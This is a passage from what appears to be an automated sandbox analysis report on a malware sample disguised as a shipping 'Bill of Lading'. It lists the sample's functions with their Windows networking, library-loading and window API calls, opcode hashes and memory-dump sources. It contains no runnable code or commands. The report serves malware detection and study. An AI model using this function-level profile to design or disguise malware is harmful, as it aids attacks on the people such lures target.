                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 4055202900-2766056989
                                                                                                                      • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                      • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                      • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                      • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                      Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset_wcslen
                                                                                                                      • String ID: |
                                                                                                                      • API String ID: 915713708-2343686810
                                                                                                                      • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                      • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                      • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                      • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                      Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                      • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                        • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3705125965-3916222277
                                                                                                                      • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                      • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                      • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                      • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                      Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                      • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                      • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                      • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                      Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                      • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                      • String ID: AU3_GetPluginDetails
                                                                                                                      • API String ID: 145871493-4132174516
                                                                                                                      • Opcode ID: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                                                                                                      • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                      • Opcode Fuzzy Hash: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                                                                                                      • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                      Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 3375834691-2298589950
                                                                                                                      • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                      • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                      • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                      • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                      Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                      • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                      • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                      • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                      • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                      Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 2507767853-2761332787
                                                                                                                      • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                      • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                      • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                      • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                      Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 2507767853-2761332787
                                                                                                                      • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                      • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                      • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                      • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                      Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                      • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                      • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                      • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                      Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                                                      • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                      • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 1515696956-2761332787
                                                                                                                      • Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                                                                      • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                      • Opcode Fuzzy Hash: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                                                                                      • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                      Function 0046CD9A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                      • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                      • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                      • Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                                                                      • Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
                                                                                                                      • Opcode Fuzzy Hash: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                                                                                      • Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56
                                                                                                                      Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                      • DrawMenuBar.USER32 ref: 00449828
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 772068139-4108050209
                                                                                                                      • Opcode ID: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                                                                                                      • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                      • Opcode Fuzzy Hash: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                                                                                                      • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                      Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocTask_wcslen
                                                                                                                      • String ID: hkG
                                                                                                                      • API String ID: 2651040394-3610518997
                                                                                                                      • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                      • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                      • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                      • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                      Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                      • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                      • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                      • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                      • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                      Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
